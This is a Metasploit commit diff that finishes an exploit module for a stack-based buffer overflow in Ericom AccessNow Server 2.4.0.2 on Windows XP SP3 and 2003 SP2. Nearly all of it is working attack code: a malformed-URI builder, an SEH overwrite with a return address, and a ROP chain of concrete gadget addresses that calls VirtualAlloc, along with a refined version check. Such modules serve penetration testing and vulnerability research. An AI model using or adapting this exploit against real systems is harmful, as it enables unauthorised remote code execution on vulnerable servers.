Finish module

jvazquez-r7 · jvazquez-r7 · commit 113333270235 · 2014-06-17T15:01:35.000-05:00
diff --git a/modules/exploits/windows/http/ericom_access_now_bof.rb b/modules/exploits/windows/http/ericom_access_now_bof.rb
@@ -17,7 +17,7 @@ def initialize(info = {})
         This module exploits a stack based buffer overflow in Ericom AccessNow Server. The
         vulnerability is due to an insecure usage of vsprintf with used controlled data,
         which can be triggered with a malformed HTTP request. This module has been tested
-        successfully with Ericom AccessNow Server 2.4.0 on Windows XP SP3 and Windows 2003
+        successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003
         Server SP2.
       },
       'Author'         =>
@@ -34,6 +34,7 @@ def initialize(info = {})
         ],
       'Privileged'     => true,
       'Platform'       => 'win',
+      'Arch'           => ARCH_X86,
       'Payload'        =>
         {
           'Space'    => 4096,
@@ -43,7 +44,7 @@ def initialize(info = {})
         },
       'Targets'        =>
         [
-          [ 'Ericom AccessNow Server 2.4.0 / Windows [XP SP3 / 2003 SP2]',
+          [ 'Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]',
             {
               'RopOffset' => 62,
               'Offset' => 30668,
@@ -63,22 +64,27 @@ def check
       'uri' => '/AccessNow/start.html'
     })
 
-    if res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom AccessNow Server/
-      return Exploit::CheckCode::Detected
+    unless res && res.code == 200 && res.headers['Server']
+      return Exploit::CheckCode::Safe
     end
 
-    return Exploit::CheckCode::Safe
+    if res.headers['Server'] =~ /Ericom AccessNow Server/
+      return Exploit::CheckCode::Appears # Ericom AccessNow 2.4
+    elsif res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom Access Server/
+      return Exploit::CheckCode::Detected # Ericom AccessNow 3
+    end
+
+    Exploit::CheckCode::Unknown
   end
 
   def exploit_uri
-    uri = "A " # To ensure a "malformed request" error message
-    uri << "C" * (62)
+    uri = "#{rand_text_alpha(1)} " # To ensure a "malformed request" error message
+    uri << rand_text(target['RopOffset'])
     uri << create_rop_chain
     uri << payload.encoded
-    print_status("#{Rex::Text.to_hex_dump(payload.encoded)}")
-    uri << "B" * (0x77cc - uri.length)
-    uri << "CCCC" #nseh
-    uri << [0x104da1e5].pack("V") #seh
+    uri << rand_text(target['Offset'] - uri.length)
+    uri << rand_text(4) # nseh
+    uri << [target.ret].pack("V") # seh
 
     uri
   end
@@ -96,8 +102,8 @@ def create_rop_chain
     # rop chain generated with mona.py - www.corelan.be
     rop_gadgets =
       [
-        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure compatibility with all window versions
-        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure compatibility with all window versions
+        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3
+        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3
         0x10518866, # POP EAX # RETN [AccessNowAccelerator32.dll]
         0x105c6294, # ptr to &VirtualAlloc() [IAT AccessNowAccelerator32.dll]
         0x101f292b, # MOV EAX,DWORD PTR DS:[EAX] # RETN [AccessNowAccelerator32.dll]
